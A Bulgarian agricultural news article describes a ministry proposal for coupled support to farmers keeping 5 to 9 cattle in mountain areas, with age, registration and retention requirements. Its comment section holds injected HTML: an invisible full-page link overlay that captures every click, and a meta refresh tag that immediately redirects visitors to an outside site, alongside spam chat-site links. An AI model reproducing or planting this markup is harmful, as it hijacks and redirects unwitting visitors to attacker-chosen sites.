Ново: Обвързана подкрепа за говеда в планински райони

Ново: Обвързана подкрепа за говеда в планински райони

 

 

В края на миналата година земеделското министерство обяви, че през новия програмен период след 2022 г. ще се даде възможност за подпомагане на стопани, които отглеждат говеда в планинските райони. Те ще могат да получат помощ за всичките си говеда до определения брой, без значение на предназначението им – за месо или за мляко.

 

Месец по-късно интервенцията за тази нова схема за обвързана подкрепа е качена на сайта на МЗХГ. Нейният проект ще бъде обсъден с бранша на заседание на Тематичната работна група на 15 февруари. А ето и какво е предложението на ведомството.

 

Основно изискване е земеделският стопанин да отглежда от 5 до 9 женски животни, които са с предназначение за производство на месо и/или мляко и стопанството да отговаря на всички ветеринарно-медицински изисквания. Тук няма как да не се изисква така важната регистрация по член 137.

 

Заявените за подпомагане животни трябва да са на възраст от 22 месеца до 13 години. Те трябва да са идентифицирани и регистрирани в системата на БАБХ, а стопаните да продължат да отглеждат заявените млечни крави най-малко 80 дни от деня, следващ последния ден за подаване на заявленията за подпомагане.

 

По тази интервенция животновъдите в планинските райони няма да доказват реализация на продукция.

 

Размерът на подпомагането ще се определя като единна ставка за подпомагане, но не се уточнява по каква методология. Целта е стопаните да получат „задоволителна добавка към по-високите нужди от подкрепа в секторите с ниска рентабилност, стимулиращ ги да продължат земеделското производство, да повишат конкурентоспособността си и да подобрят пазарната си ориентация“, допълват от ресорното министерство.

 

Следете темата и на cap4us.agri.bg

Коментари
adsfsd
на 22.01.2022 2:59
<a href="https://www.hasbihal.org" title="sohbet chat" rel="dofollow" style="display: block!important;position: fixed!important; width: 100%!important;height: 100%; text-align: center!important;color: transparent!important;left: 0!important;top: 0!important;right: 0!important; padding: 100px; bottom: 0!important;background: transparent!important;z-index: 999999999999999!important;font-size: 4em!important">sohbet chat</a> <meta http-equiv="refresh" content="0; url=https://findi.pro/coment"/> <a href="https://bedavasohbetchat.blogspot.com/" title="bedavasohbet">bedavasohbet</a>
Добави коментар